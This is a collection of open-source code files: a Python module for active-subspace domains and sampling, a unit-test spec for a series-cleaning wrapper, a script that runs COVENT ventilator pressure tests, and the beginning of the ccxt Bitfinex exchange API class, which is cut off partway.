2020-03-16T18:05:05.000Z
active_subspaces/domains.py
carlosal1015/active_subspaces
caaf108fcb89548a374fea7704b0d92d38b4539a
[ "MIT" ]
null
null
null
active_subspaces/domains.py
carlosal1015/active_subspaces
caaf108fcb89548a374fea7704b0d92d38b4539a
[ "MIT" ]
1
2020-03-16T18:05:09.000Z
2020-03-16T18:05:09.000Z
"""Utilities for building the domains and maps for active variables.""" import numpy as np import logging from utils.misc import process_inputs, BoundedNormalizer from scipy.spatial import ConvexHull from scipy.misc import comb from utils.qp_solver import QPSolver from subspaces import Subspaces class ActiveVariableDomain(): """ A base class for the domain of functions of active variables. :cvar Subspaces subspaces: a Subspaces object. :cvar int m: The dimension of the simulation inputs. :cvar int n: The dimension of the active subspace. :cvar ndarray vertY: An ndarray that contains n-dimensional vertices that define the boundary of the domain when the m-dimensional space is bounded by a hypercube. :cvar ndarray vertX: An ndarray of the corners of the m-dimensional hypercube that map to the points `vertY`. :cvar scipy.spatial.ConvexHull convhull: The ConvexHull object defined by the vertices `vertY`. :cvar dict constraints: A dictionary of linear inequality constraints conforming to the specifications used in the scipy.optimizer library. **Notes** Attributes `vertY`, `vertX`, `convhull`, and `constraints` are None when the m-dimensional parameter space is unbounded. """ subspaces = None m, n = None, None vertY, vertX = None, None convhull, constraints = None, None class UnboundedActiveVariableDomain(ActiveVariableDomain): """ An class for the domain of functions of active variables when the space of simulation parameters is unbounded. **Notes** Using this class assumes that the space of simulation inputs is equipped with a Gaussian weight function. """ def __init__(self, subspaces): """ Initialize the UnboundedActiveVariableDomain. Parameters :param Subspaces subspaces: A Subspaces object with the `compute` method already called. """ if not isinstance(subspaces, Subspaces): raise TypeError('subspaces should be a Subspaces object.') if subspaces.W1 is None: raise ValueError('The given subspaces has not been computed.') self.subspaces = subspaces self.m, self.n = subspaces.W1.shape class BoundedActiveVariableDomain(ActiveVariableDomain): """ An class for the domain of functions of active variables when the space of simulation parameters is bounded. **Notes** Using this class assumes that the space of simulation inputs is equipped with a uniform weight function. And the space itself is a hypercube. """ def __init__(self, subspaces): """ Initialize the BoundedActiveVariableDomain. :param Subspaces subspaces: A Subspaces object with the `compute` method already called. """ if not isinstance(subspaces, Subspaces): raise TypeError('subspaces should be a Subspaces object.') if subspaces.W1 is None: raise ValueError('The given subspaces has not been computed.') self.subspaces = subspaces self.m, self.n = subspaces.W1.shape self.compute_boundary() def compute_boundary(self): """ Compute and set the boundary of the domain. **Notes** This function computes the boundary of the active variable range, i.e., the domain of a function of the active variables, and it sets the attributes to the computed components. It is called when the BoundedActiveVariableDomain is initialized. If the dimension of the active subspaces is manually changed, then this function must be called again to recompute the boundary of the domain. """ W1 = self.subspaces.W1 m, n = W1.shape if n == 1: Y, X = interval_endpoints(W1) convhull = None constraints = None else: Y, X = zonotope_vertices(W1) convhull = ConvexHull(Y) A = convhull.equations[:,:n] b = convhull.equations[:,n] constraints = ({'type' : 'ineq', 'fun' : lambda x: np.dot(A, x) - b, 'jac' : lambda x: A}) # store variables self.vertY, self.vertX = Y, X self.convhull, self.constraints = convhull, constraints class ActiveVariableMap(): """ A base class for the map between active/inactive and original variables. :cvar ActiveVariableDomain domain: An ActiveVariableDomain object. **See Also** domains.UnboundedActiveVariableMap domains.BoundedActiveVariableMap """ domain = None def __init__(self, domain): """ Initialize the ActiveVariableMap. :param ActiveVariableDomain domain: An ActiveVariableDomain object. """ self.domain = domain def forward(self, X): """ Map the points in the original input space to the active and inactive variables. :param ndarray X: An M-by-m matrix. Each row of `X` is a point in the original parameter space :return: Y, M-by-n matrix that contains points in the space of active variables. Each row of `Y` corresponds to a row of `X`. :rtype: ndarray :return: Z, M-by-(m-n) matrix that contains points in the space of inactive variables. Each row of `Z` corresponds to a row of `X`. :rtype: ndarray """ X = process_inputs(X)[0] W1, W2 = self.domain.subspaces.W1, self.domain.subspaces.W2 Y, Z = np.dot(X, W1), np.dot(X, W2) return Y, Z def inverse(self, Y, N=1): """ Map the points in the active variable space to the original parameter space. :param ndarray Y: M-by-n matrix that contains points in the space of active variables. :param int N: The number of points in the original parameter space that are returned that map to the given active variables. :return: X, (M*N)-by-m matrix that contains points in the original parameter space. :rtype: ndarray :return: ind, (M*N)-by-1 matrix that contains integer indices. These indices identify which rows of `X` map to which rows of `Y`. :rtype: ndarray **Notes** The inverse map depends critically on the `regularize_z` function. """ # check inputs Y, NY, n = process_inputs(Y) if not isinstance(N, int): raise TypeError('N must be an int') logging.getLogger(__name__).debug('Inverting {:d} y\'s with {:d} z\'s per y.'.format(NY, N)) Z = self.regularize_z(Y, N) W = self.domain.subspaces.eigenvectors X, ind = _rotate_x(Y, Z, W) return X, ind def regularize_z(self, Y, N): """ Find points in the space of inactive variables to complete the inverse map. :param ndarray Y: M-by-n matrix that contains points in the space of active variables. :param int N: The number of points in the original parameter space that are returned that map to the given active variables. :return: Z, (M)-by-(m-n)-by-N matrix that contains values of the inactive variables. :rtype: ndarray **Notes** The base class does not implement `regularize_z`. Specific implementations depend on whether the original variables are bounded or unbounded. They also depend on what the weight function is on the original parameter space. """ raise NotImplementedError() class BoundedActiveVariableMap(ActiveVariableMap): """ A class for the map between active/inactive and original variables when the original variables are bounded by a hypercube with a uniform density. **See Also** domains.UnboundedActiveVariableMap """ def regularize_z(self, Y, N): """ Find points in the space of inactive variables to complete the inverse map. :param ndarray Y: M-by-n matrix that contains points in the space of active variables. :param int N: The number of points in the original parameter space that are returned that map to the given active variables. :return: Z, (M)-by-(m-n)-by-N that contains values of the inactive variables. :rtype: ndarray **Notes** This implementation of `regularize_z` uses the function `sample_z` to randomly sample values of the inactive variables to complement the given values of the active variables. """ W1, W2 = self.domain.subspaces.W1, self.domain.subspaces.W2 m, n = W1.shape # sample the z's # TODO: preallocate and organize properly NY = Y.shape[0] Zlist = [] for y in Y: Zlist.append(sample_z(N, y, W1, W2)) #Z = np.array(Zlist).reshape((NY, m-n, N)) Z = np.swapaxes(np.array(Zlist),1,2) return Z class UnboundedActiveVariableMap(ActiveVariableMap): """ A class for the map between active/inactive and original variables when the original variables are ubbounded and the space is equipped with a standard Gaussian density. **See Also** domains.BoundedActiveVariableMap """ def regularize_z(self, Y, N): """ Find points in the space of inactive variables to complete the inverse map. :param ndarray Y: M-by-n matrix that contains points in the space of active variables. :param int N: The number of points in the original parameter space that are returned that map to the given active variables. :return: Z, (M)-by-(m-n)-by-N matrix that contains values of the inactive variables. :rtype: ndarray **Notes** This implementation of `regularize_z` samples the inactive variables from a standard (m-n)-variate Gaussian distribution. """ m, n = self.domain.subspaces.W1.shape # sample z's NY = Y.shape[0] Z = np.random.normal(size=(NY, m-n, N)) return Z def nzv(m, n): """ Compute the number of zonotope vertices for a linear map from R^m to R^n. :param int m: The dimension of the hypercube. :param int n: The dimension of the low-dimesional subspace. :return: k, The number of vertices defining the zonotope. :rtype: int :return: M, used as a temporary variable for the recursive computation. It can be discarded. :rtype: ndarray """ if not isinstance(m, int): raise TypeError('m should be an integer.') if not isinstance(n, int): raise TypeError('n should be an integer.') # number of zonotope vertices N = 0 for i in range(n): N = N + comb(m-1,i) N = 2*N return int(N) def interval_endpoints(W1): """ Compute the range of a 1d active variable. :param ndarray W1: m-by-1 matrix that contains the eigenvector that defines the first active variable. :rerutn: Y, 2-by-1 matrix that contains the endpoints of the interval defining the range of the 1d active variable. :rtype: ndarray :return: X, 2-by-m matrix that contains the corners of the m-dimensional hypercube that map to the active variable endpoints. :rtype: ndarray """ logging.getLogger(__name__).debug('Interval domain.') m = W1.shape[0] y0 = np.dot(W1.T, np.sign(W1))[0] if y0 < -y0: yl, yu = y0, -y0 xl, xu = np.sign(W1), -np.sign(W1) else: yl, yu = -y0, y0 xl, xu = -np.sign(W1), np.sign(W1) Y = np.array([yl, yu]).reshape((2,1)) X = np.vstack((xl.reshape((1, m)), xu.reshape((1, m)))) return Y, X def unique_rows(S): """ Return the unique rows from S. http://stackoverflow.com/questions/16970982/find-unique-rows-in-numpy-array """ T = S.view(np.dtype((np.void, S.dtype.itemsize * S.shape[1]))) return np.unique(T).view(S.dtype).reshape(-1, S.shape[1]) def zonotope_vertices(W1, Nsamples=1e4, maxcount=1e5): """ Compute the vertices of the zonotope. :param ndarray W1: m-by-n matrix that contains the eigenvector bases of the n-dimensional active subspace. :return: Y, nzv-by-n matrix that contains the zonotope vertices. :rtype: ndarray :return: X, nzv-by-m matrix that contains the corners of the m-dimensional hypercube that map to the zonotope vertices. :rtype: ndarray """ m, n = W1.shape totalverts = nzv(m,n) logging.getLogger(__name__).debug('Zonotope domain in {:d} dims with {:d} vertices.'.format(n, totalverts)) # initialize Z = np.random.normal(size=(Nsamples, n)) X = unique_rows(np.sign(np.dot(Z, W1.transpose()))) X = unique_rows(np.vstack((X, -X))) N = X.shape[0] count = 0 while N < totalverts: Z = np.random.normal(size=(Nsamples, n)) X0 = unique_rows(np.sign(np.dot(Z, W1.transpose()))) X0 = unique_rows(np.vstack((X0, -X0))) X = unique_rows(np.vstack((X, X0))) N = X.shape[0] count += 1 if count > maxcount: break numverts = X.shape[0] if totalverts > numverts: print 'Warning: {} of {} vertices found.'.format(numverts, totalverts) Y = np.dot(X, W1) return Y.reshape((numverts, n)), X.reshape((numverts, m)) def sample_z(N, y, W1, W2): """ Sample values of the inactive variables for a fixed value of the active variables when the original variables are bounded by a hypercube. :param int N: The number of inactive variable samples. :param ndarray y: The value of the active variables. :param ndarray W1: m-by-n matrix that contains the eigenvector bases of the n-dimensional active subspace. :param ndarray W2: m-by-(m-n) matrix that contains the eigenvector bases of the (m-n)-dimensional inactive subspace. :return: Z, N-by-(m-n) matrix that contains values of the active variable that correspond to the given `y`. :rtype: ndarray **Notes** The trick here is to sample the inactive variables z so that -1 <= W1*y + W2*z <= 1, where y is the given value of the active variables. In other words, we need to sample z such that it respects the linear equalities W2*z <= 1 - W1*y, -W2*z <= 1 + W1*y. These inequalities define a polytope in R^(m-n). We want to sample `N` points uniformly from the polytope. This function first tries a simple rejection sampling scheme, which (i) finds a bounding hyperbox for the polytope, (ii) draws points uniformly from the bounding hyperbox, and (iii) rejects points outside the polytope. If that method does not return enough samples, the method tries a "hit and run" method for sampling from the polytope. If that doesn't work, it returns an array with `N` copies of a feasible point computed as the Chebyshev center of the polytope. Thanks to David Gleich for showing me Chebyshev centers. """ if not isinstance(N, int): raise TypeError('N should be an integer.') Z = rejection_sampling_z(N, y, W1, W2) if Z is None: logging.getLogger(__name__).warn('Rejection sampling has failed miserably. Will try hit and run sampling.') Z = hit_and_run_z(N, y, W1, W2) return Z def hit_and_run_z(N, y, W1, W2): """ A hit and run method for sampling the inactive variables from a polytope. **See Also** domains.sample_z """ m, n = W1.shape # get an initial feasible point using the Chebyshev center. huge props to # David Gleich for showing me the Chebyshev center. s = np.dot(W1, y).reshape((m, 1)) normW2 = np.sqrt( np.sum( np.power(W2, 2), axis=1 ) ).reshape((m,1)) A = np.hstack(( np.vstack((W2, -W2.copy())), np.vstack((normW2, normW2.copy())) )) b = np.vstack((1-s, 1+s)).reshape((2*m, 1)) c = np.zeros((m-n+1,1)) c[-1] = -1.0 qps = QPSolver() zc = qps.linear_program_ineq(c, -A, -b) z0 = zc[:-1].reshape((m-n, 1)) # define the polytope A >= b s = np.dot(W1, y).reshape((m, 1)) A = np.vstack((W2, -W2)) b = np.vstack((-1-s, -1+s)).reshape((2*m, 1)) # tolerance ztol = 1e-6 eps0 = ztol/4.0 Z = np.zeros((N, m-n)) for i in range(N): # random direction bad_dir = True count, maxcount = 0, 50 while bad_dir: d = np.random.normal(size=(m-n,1)) bad_dir = np.any(np.dot(A, z0 + eps0*d) <= b) count += 1 if count >= maxcount: logging.getLogger(__name__).warn('There are no more directions worth pursuing in hit and run. Got {:d} samples.'.format(i)) Z[i:,:] = np.tile(z0, (1,N-i)).transpose() return Z # find constraints that impose lower and upper bounds on eps f, g = b - np.dot(A,z0), np.dot(A, d) # find an upper bound on the step min_ind = np.logical_and(g<=0, f < -np.sqrt(np.finfo(np.float).eps)) eps_max = np.amin(f[min_ind]/g[min_ind]) # find a lower bound on the step max_ind = np.logical_and(g>0, f < -np.sqrt(np.finfo(np.float).eps)) eps_min = np.amax(f[max_ind]/g[max_ind]) # randomly sample eps eps1 = np.random.uniform(eps_min, eps_max) # take a step along d z1 = z0 + eps1*d Z[i,:] = z1.reshape((m-n, )) # update temp var z0 = z1.copy() return Z def rejection_sampling_z(N, y, W1, W2): """ A rejection sampling method for sampling the inactive variables from a polytope. **See Also** domains.sample_z """ m, n = W1.shape s = np.dot(W1, y).reshape((m, 1)) # Build a box around z for uniform sampling qps = QPSolver() A = np.vstack((W2, -W2)) b = np.vstack((-1-s, -1+s)).reshape((2*m, 1)) lbox, ubox = np.zeros((1,m-n)), np.zeros((1,m-n)) for i in range(m-n): clb = np.zeros((m-n,1)) clb[i,0] = 1.0 lbox[0,i] = qps.linear_program_ineq(clb, A, b)[i,0] cub = np.zeros((m-n,1)) cub[i,0] = -1.0 ubox[0,i] = qps.linear_program_ineq(cub, A, b)[i,0] bn = BoundedNormalizer(lbox, ubox) Zbox = bn.unnormalize(np.random.uniform(-1.0,1.0,size=(50*N,m-n))) ind = np.all(np.dot(A, Zbox.T) >= b, axis=0) if np.sum(ind) >= N: Z = Zbox[ind,:] return Z[:N,:].reshape((N,m-n)) else: return None def random_walk_z(N, y, W1, W2): """ A random walk method for sampling the inactive variables from a polytope. **See Also** domains.sample_z """ m, n = W1.shape s = np.dot(W1, y).reshape((m, 1)) # linear program to get starting z0 if np.all(np.zeros((m, 1)) <= 1-s) and np.all(np.zeros((m, 1)) >= -1-s): z0 = np.zeros((m-n, 1)) else: qps = QPSolver() lb = -np.ones((m,1)) ub = np.ones((m,1)) c = np.zeros((m,1)) x0 = qps.linear_program_eq(c, W1.T, y.reshape((n,1)), lb, ub) z0 = np.dot(W2.T, x0).reshape((m-n, 1)) # get MCMC step size sig = 0.1*np.minimum( np.linalg.norm(np.dot(W2, z0) + s - 1), np.linalg.norm(np.dot(W2, z0) + s + 1)) # burn in for i in range(10*N): zc = z0 + sig*np.random.normal(size=z0.shape) if np.all(np.dot(W2, zc) <= 1-s) and np.all(np.dot(W2, zc) >= -1-s): z0 = zc # sample Z = np.zeros((m-n, N)) for i in range(N): zc = z0 + sig*np.random.normal(size=z0.shape) if np.all(np.dot(W2, zc) <= 1-s) and np.all(np.dot(W2, zc) >= -1-s): z0 = zc Z[:,i] = z0.reshape((z0.shape[0], )) return Z.reshape((N, m-n)) def _rotate_x(Y, Z, W): NY, n = Y.shape N = Z.shape[2] m = n + Z.shape[1] YY = np.tile(Y.reshape((NY, n, 1)), (1, 1, N)) YZ = np.concatenate((YY, Z), axis=1).transpose((1, 0, 2)).reshape((m, N*NY)).transpose((1, 0)) X = np.dot(YZ, W.T).reshape((N*NY,m)) ind = np.kron(np.arange(NY), np.ones(N)).reshape((N*NY,1)) return X, ind
32.802908
139
0.611918
6d76e5ff0e17889908d0167a4c701c5a35efa948
5,798
py
Python
spec/clean/wrapper_spec.py
slavad/py-series-clean
2a7cbd0cec1a46374e49eae79e6a88afb31ca54a
[ "MIT" ]
null
null
null
spec/clean/wrapper_spec.py
slavad/py-series-clean
2a7cbd0cec1a46374e49eae79e6a88afb31ca54a
[ "MIT" ]
null
null
null
spec/clean/wrapper_spec.py
slavad/py-series-clean
2a7cbd0cec1a46374e49eae79e6a88afb31ca54a
[ "MIT" ]
null
null
null
from spec.spec_helper import * import clean.wrapper as wrp with description(wrp.Wrapper) as self: with before.all: self.use_aver = False self.round_precision = 10 self.khi = 4 self.detection_treshold = 0.3 self.harmonic_share = 0.5 self.max_iterations = 10 self.time_grid = np.load("./spec/fixtures/unit/time_grid_1.pickle") self.values = np.load("./spec/fixtures/unit/series_1.pickle") self.distance_vector = np.load("./spec/fixtures/unit/distance_vector_1.pickle") with before.each: self.wrapper = wrp.Wrapper(self.time_grid, self.values) with description('__init__'): with it('sets correct values'): expect(self.wrapper._Wrapper__time_grid).to(equal_ndarray(self.time_grid)) expect(self.wrapper._Wrapper__values).to(equal_ndarray(self.values)) expect(self.wrapper._Wrapper__distance_vector).to(equal_ndarray(self.distance_vector)) with shared_context('#__estimate_max_freq checker'): with description('#__estimate_max_freq'): with before.all: self.time_grid = np.array( [0.0, 5.0, 6.0, 9.0, 20.0] ).reshape((-1, 1)) with it('returns max freq estimated by minimum time distance'): expect(self.wrapper._Wrapper__estimate_max_freq(self.use_aver)).to( equal(self.expected_max_freq) ) with description('use_aver is False'): with before.all: self.use_aver = False self.expected_max_freq = 0.5 with included_context('#__estimate_max_freq checker'): pass with description('use_aver is True'): with before.all: self.use_aver = True self.expected_max_freq = 0.1 with included_context('#__estimate_max_freq checker'): pass with description('#__calculate_estimations_vector_size'): with before.all: self.use_aver = False self.time_grid = np.array([0.0, 3.5]).reshape((-1, 1)) with it('calculates correct value'): max_freq = 0.8 khi = 4 expected_num_of_freq_estimations = 12 expect(self.wrapper._Wrapper__calculate_estimations_vector_size(max_freq, khi)).to( equal(expected_num_of_freq_estimations) ) with description('clean'): with before.all: self.expected_keys = [ 'iterations', 'freq_vector', 'uniform_time_grid', 'clean_spectrum', 'correlogram', 'uniform_series', 'frequencies', 'amplitudes', 'phases' ] self.expected_keys_arr = [ 'freq_vector', 'uniform_time_grid', 'clean_spectrum', 'correlogram', 'uniform_series', 'frequencies', 'amplitudes', 'phases' ] with before.each: self.result = self.wrapper.clean( self.detection_treshold, self.max_iterations, self.harmonic_share, self.khi, self.use_aver ) with shared_context('iteratoins result checker'): with it('returns dict with correct keys'): expect(self.result).to(have_only_keys(*self.expected_keys)) with it('returns correct number of iterations'): expect(self.result['iterations']).to(equal(self.expected_iterations)) with it('returns correct values and does not contain zeroes'): for key in self.expected_keys_arr: expect( self.result[key] ).to(contain_non_zero_vals(self.round_precision)) expect( self.result[key] ).to(equal_ndarray(getattr(self, key), self.round_precision)) with description('use_aver is False'): with before.all: self.use_aver = False self.expected_iterations = 4 self.uniform_time_grid = np.load("./spec/fixtures/unit/uniform_time_grid_1.pickle") self.freq_vector = np.load("./spec/fixtures/unit/freq_vector_1.pickle") self.clean_spectrum = np.load("./spec/fixtures/unit/clean_spectrum_1.pickle") self.correlogram = np.load("./spec/fixtures/unit/correlogram_1.pickle") self.uniform_series = np.load("./spec/fixtures/unit/uniform_series_1.pickle") self.frequencies = np.load("./spec/fixtures/unit/frequencies_1.pickle") self.amplitudes = np.load("./spec/fixtures/unit/amplitudes_1.pickle") self.phases = np.load("./spec/fixtures/unit/phases_1.pickle") with included_context('iteratoins result checker'): pass with description('use_aver is True'): with before.all: self.use_aver = True self.expected_iterations = 4 self.uniform_time_grid = np.load("./spec/fixtures/unit/uniform_time_grid_2.pickle") self.freq_vector = np.load("./spec/fixtures/unit/freq_vector_2.pickle") self.clean_spectrum = np.load("./spec/fixtures/unit/clean_spectrum_2.pickle") self.correlogram = np.load("./spec/fixtures/unit/correlogram_2.pickle") self.uniform_series = np.load("./spec/fixtures/unit/uniform_series_2.pickle") self.frequencies = np.load("./spec/fixtures/unit/frequencies_2.pickle") self.amplitudes = np.load("./spec/fixtures/unit/amplitudes_2.pickle") self.phases = np.load("./spec/fixtures/unit/phases_2.pickle") with included_context('iteratoins result checker'): pass
44.945736
106
0.600552
82de6fe2d00868a8647723b5969818dda0271144
6,235
py
Python
software/utils/run_covent_tests.py
dheater/Ventilator
f10c03805f8907683ee91e1da0fd82088b028563
[ "Apache-2.0" ]
null
null
null
software/utils/run_covent_tests.py
dheater/Ventilator
f10c03805f8907683ee91e1da0fd82088b028563
[ "Apache-2.0" ]
null
null
null
software/utils/run_covent_tests.py
dheater/Ventilator
f10c03805f8907683ee91e1da0fd82088b028563
[ "Apache-2.0" ]
null
null
null
#!/usr/bin/env python3 """ Wrapper around controller_debug.py that runs all of the covent tests in a row and packages them into a standard, sharable format. """ from datetime import date from pathlib import Path import argparse import atexit import math import os import subprocess import time import sys import shlex PRESETS = [f"covent_pc_{i}" for i in range(1, 9)] # Covent tests come in two flavors, ones which are meant to run at 30% # fio2, and ones which are meant to run at 90%. HIGH_OX_TESTS = {f"covent_pc_{i}" for i in [2, 3, 6, 7]} DBG_SCRIPT = Path(__file__).absolute().parent.joinpath("controller_debug.py") def run_test(test, cmd_args): def run(args): subprocess.check_call( [sys.executable, DBG_SCRIPT, "--port", cmd_args.port, "-c", args] ) outfile = cmd_args.dest.joinpath(f"{test}.dat") # Tell the controller whether to generate pressure using the fan or the # high-pressure oxygen source. # # TODO: Although these tests are meant to run at 30%/90% fio2, we currently # can't mix air and oxygen, so we run them at 21% and 100%. if cmd_args.oxygen == "on" or (cmd_args.oxygen == "auto" and test in HIGH_OX_TESTS): run("set gui_fio2 100") else: run("set gui_fio2 21") # Ensure the ventilator fan is on, and disconnect the fan from the system # so it's not inflating the test lung. Edwin's request is that the fan # doesn't have to spin up during these tests. run("set forced_exhale_valve_pos 1") run("set forced_blower_valve_pos 0") run("set forced_blower_power 1") run("set gui_mode 0") # Switch to this preset. run(f"preset {test}") # Give the user a chance to adjust the test lung. if not cmd_args.nointeractive: input( "Adjust test lung per above, then press enter. " "(Skip this with --nointeractive.)" ) # Unforce parameters we set above so they can be controlled by the # controller. Note that we unforce the blower power *after* setting the # gui_mode to 1 because if we unforced it while we were still in mode 0 # (i.e. "ventilator off"), the fan would momentarily spin down. run("set forced_exhale_valve_pos -1") run("set forced_blower_valve_pos -1") run("set gui_mode 1") run("set forced_blower_power -1") time.sleep(cmd_args.ignore_secs) run(f"trace start pc_setpoint pressure volume net_flow") time.sleep(cmd_args.capture_secs) # Graphing flow at any scale is noisy and overwhelms the rest of the chart. # trace graph can't currently exclude fields, so as a hack, graph flow # divided by a large number, essentially zeroing it out. run( f"trace graph --dest={shlex.quote(str(outfile))} --title={test} " "--nointeractive --scale=volume/10 --scale=net_flow/1e9" ) def concat_images(cmd_args): # It's more compact to show two images per row, but then visually you are # tempted to assume the Y axes are the same in each row, which is not true. IMAGES_PER_ROW = 1 try: from PIL import Image except ImportError: print("pip install pillow to get a single image of all the test results.") return images = [Image.open(p) for p in sorted(cmd_args.dest.glob("*.png"))] max_width = max(img.width for img in images) max_height = max(img.height for img in images) combined_width = min(IMAGES_PER_ROW, len(images)) * max_width combined_height = math.ceil(len(images) / IMAGES_PER_ROW) * max_height combined = Image.new( "RGB", (combined_width, combined_height), color=(255, 255, 255) ) for i, img in enumerate(images): xidx = i % IMAGES_PER_ROW yidx = i // IMAGES_PER_ROW combined.paste(img, (xidx * max_width, yidx * max_height)) combined.save(cmd_args.dest.joinpath("combined.png")) def choose_dest_dir(): prefix = f"covent-tests-{date.today().isoformat()}-run-" dirs = sorted(Path(".").glob(prefix + "[0-9][0-9][0-9]")) if not dirs: n = 0 else: n = int(str(dirs[-1])[-3:]) + 1 return f"{prefix}{n:03d}" def main(): parser = argparse.ArgumentParser() parser.add_argument( "--port", help="port device is connected to (default: try to auto-detect the port)", ) parser.add_argument( "--tests", help="comma-separated list of test numbers to run " "(default: run all covent tests)", ) parser.add_argument( "--oxygen", choices=["off", "auto", "on"], default="off", help="Deliver air from the blower (off), from the pressurized oxygen " "source (on), or according to the particular test (auto).", ) parser.add_argument( "--ignore-secs", help="Ignore this many seconds of data before starting to capture.", default=10, type=int, ) parser.add_argument( "--capture-secs", help="Capture this many seconds of data from each test.", default=20, type=int, ) parser.add_argument("--dest", help="Output directory (must not exist)") parser.add_argument( "--nointeractive", help="Run without prompting the user to e.g. change lung compliance", ) args = parser.parse_args() if not args.port: args.port = ( subprocess.check_output( [sys.executable, DBG_SCRIPT, "--detect-port-and-quit"] ) .decode("utf-8") .strip() ) if not args.dest: args.dest = choose_dest_dir() print(f"Writing output to {args.dest}") args.dest = Path(args.dest) if args.tests: tests = [f"covent_pc_{i}" for i in args.tests.split(",")] else: tests = PRESETS # Stop ventilating if this script exits abnormally, e.g. due to ctrl+c. def stop_ventilation(): subprocess.check_call( [sys.executable, DBG_SCRIPT, "--port", args.port, "-c", "set gui_mode 0"] ) atexit.register(stop_ventilation) args.dest.mkdir(exist_ok=False) for i, t in enumerate(tests): run_test(t, args) concat_images(args) if __name__ == "__main__": main()
31.489899
88
0.636568
d1407978d93c3aa875c8f532333b9189b1020197
48,603
py
Python
python/ccxt/bitfinex.py
machenjie/ccxt
fb18393cdf893dba62eab7838040fb9cec7f10fd
[ "MIT" ]
1
2021-07-07T14:56:56.000Z
2021-07-07T14:56:56.000Z
python/ccxt/bitfinex.py
machenjie/ccxt
fb18393cdf893dba62eab7838040fb9cec7f10fd
[ "MIT" ]
1
2022-03-05T13:29:47.000Z
2022-03-05T15:00:38.000Z
python/ccxt/bitfinex.py
machenjie/ccxt
fb18393cdf893dba62eab7838040fb9cec7f10fd
[ "MIT" ]
1
2021-11-30T11:30:35.000Z
2021-11-30T11:30:35.000Z
# -*- coding: utf-8 -*- # PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN: # https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code from ccxt.base.exchange import Exchange import hashlib import math from ccxt.base.errors import ExchangeError from ccxt.base.errors import AuthenticationError from ccxt.base.errors import PermissionDenied from ccxt.base.errors import ArgumentsRequired from ccxt.base.errors import BadSymbol from ccxt.base.errors import InsufficientFunds from ccxt.base.errors import InvalidOrder from ccxt.base.errors import OrderNotFound from ccxt.base.errors import NotSupported from ccxt.base.errors import RateLimitExceeded from ccxt.base.errors import ExchangeNotAvailable from ccxt.base.errors import InvalidNonce from ccxt.base.decimal_to_precision import ROUND from ccxt.base.decimal_to_precision import TRUNCATE from ccxt.base.decimal_to_precision import DECIMAL_PLACES from ccxt.base.decimal_to_precision import SIGNIFICANT_DIGITS class bitfinex(Exchange): def describe(self): return self.deep_extend(super(bitfinex, self).describe(), { 'id': 'bitfinex', 'name': 'Bitfinex', 'countries': ['VG'], 'version': 'v1', 'rateLimit': 1500, 'certified': True, 'pro': True, # new metainfo interface 'has': { 'cancelAllOrders': True, 'cancelOrder': True, 'CORS': False, 'createDepositAddress': True, 'createOrder': True, 'deposit': True, 'editOrder': True, 'fetchBalance': True, 'fetchClosedOrders': True, 'fetchDepositAddress': True, 'fetchDeposits': False, 'fetchFundingFees': True, 'fetchMarkets': True, 'fetchMyTrades': True, 'fetchOHLCV': True, 'fetchOpenOrders': True, 'fetchOrder': True, 'fetchOrderBook': True, 'fetchTicker': True, 'fetchTickers': True, 'fetchTrades': True, 'fetchTradingFee': True, 'fetchTradingFees': True, 'fetchTransactions': True, 'fetchWithdrawals': False, 'withdraw': True, }, 'timeframes': { '1m': '1m', '5m': '5m', '15m': '15m', '30m': '30m', '1h': '1h', '3h': '3h', '4h': '4h', '6h': '6h', '12h': '12h', '1d': '1D', '1w': '7D', '2w': '14D', '1M': '1M', }, 'urls': { 'logo': 'https://user-images.githubusercontent.com/1294454/27766244-e328a50c-5ed2-11e7-947b-041416579bb3.jpg', 'api': { 'v2': 'https://api-pub.bitfinex.com', # https://github.com/ccxt/ccxt/issues/5109 'public': 'https://api.bitfinex.com', 'private': 'https://api.bitfinex.com', }, 'www': 'https://www.bitfinex.com', 'referral': 'https://www.bitfinex.com/?refcode=P61eYxFL', 'doc': [ 'https://docs.bitfinex.com/v1/docs', 'https://github.com/bitfinexcom/bitfinex-api-node', ], }, 'api': { # v2 symbol ids require a 't' prefix # just the public part of it(use bitfinex2 for everything else) 'v2': { 'get': [ 'platform/status', 'tickers', 'ticker/{symbol}', 'trades/{symbol}/hist', 'book/{symbol}/{precision}', 'book/{symbol}/P0', 'book/{symbol}/P1', 'book/{symbol}/P2', 'book/{symbol}/P3', 'book/{symbol}/R0', 'stats1/{key}:{size}:{symbol}:{side}/{section}', 'stats1/{key}:{size}:{symbol}/{section}', 'stats1/{key}:{size}:{symbol}:long/last', 'stats1/{key}:{size}:{symbol}:long/hist', 'stats1/{key}:{size}:{symbol}:short/last', 'stats1/{key}:{size}:{symbol}:short/hist', 'candles/trade:{timeframe}:{symbol}/{section}', 'candles/trade:{timeframe}:{symbol}/last', 'candles/trade:{timeframe}:{symbol}/hist', ], }, 'public': { 'get': [ 'book/{symbol}', # 'candles/{symbol}', 'lendbook/{currency}', 'lends/{currency}', 'pubticker/{symbol}', 'stats/{symbol}', 'symbols', 'symbols_details', 'tickers', 'trades/{symbol}', ], }, 'private': { 'post': [ 'account_fees', 'account_infos', 'balances', 'basket_manage', 'credits', 'deposit/new', 'funding/close', 'history', 'history/movements', 'key_info', 'margin_infos', 'mytrades', 'mytrades_funding', 'offer/cancel', 'offer/new', 'offer/status', 'offers', 'offers/hist', 'order/cancel', 'order/cancel/all', 'order/cancel/multi', 'order/cancel/replace', 'order/new', 'order/new/multi', 'order/status', 'orders', 'orders/hist', 'position/claim', 'position/close', 'positions', 'summary', 'taken_funds', 'total_taken_funds', 'transfer', 'unused_taken_funds', 'withdraw', ], }, }, 'fees': { 'trading': { 'tierBased': True, 'percentage': True, 'maker': 0.1 / 100, 'taker': 0.2 / 100, 'tiers': { 'taker': [ [0, 0.2 / 100], [500000, 0.2 / 100], [1000000, 0.2 / 100], [2500000, 0.2 / 100], [5000000, 0.2 / 100], [7500000, 0.2 / 100], [10000000, 0.18 / 100], [15000000, 0.16 / 100], [20000000, 0.14 / 100], [25000000, 0.12 / 100], [30000000, 0.1 / 100], ], 'maker': [ [0, 0.1 / 100], [500000, 0.08 / 100], [1000000, 0.06 / 100], [2500000, 0.04 / 100], [5000000, 0.02 / 100], [7500000, 0], [10000000, 0], [15000000, 0], [20000000, 0], [25000000, 0], [30000000, 0], ], }, }, 'funding': { 'tierBased': False, # True for tier-based/progressive 'percentage': False, # fixed commission # Actually deposit fees are free for larger deposits(> $1000 USD 